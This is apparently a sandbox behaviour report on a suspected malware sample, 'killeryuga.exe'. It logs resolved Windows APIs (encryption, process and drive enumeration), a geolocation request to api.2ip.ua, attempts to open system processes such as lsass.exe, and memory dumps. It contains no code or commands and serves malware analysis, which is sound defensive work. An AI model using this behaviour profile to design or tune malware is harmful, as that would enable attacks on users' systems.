Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
System (255)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
Get Time type = Ticks, time = 94630 True 1
Fn
Get Time type = Performance Ctr, time = 14013587204 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15114094153 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.25 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #20: killeryuga.exe
684 2
»
Information Value
ID #20
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x7a0
Parent PID 0x588 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7B0
0x 6A4
0x 6A0
0x 33C
0x 6AC
0x 694
0x 698
0x 69C
0x 688
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x002B43B0 0x002E3716 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Forced - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (48)
»
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 20
Fn
Module (314)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750d0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x75090000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load USER32.dll base_address = 0x75470000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 1
Fn
Load SHELL32.dll base_address = 0x75e30000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75020000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74e80000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
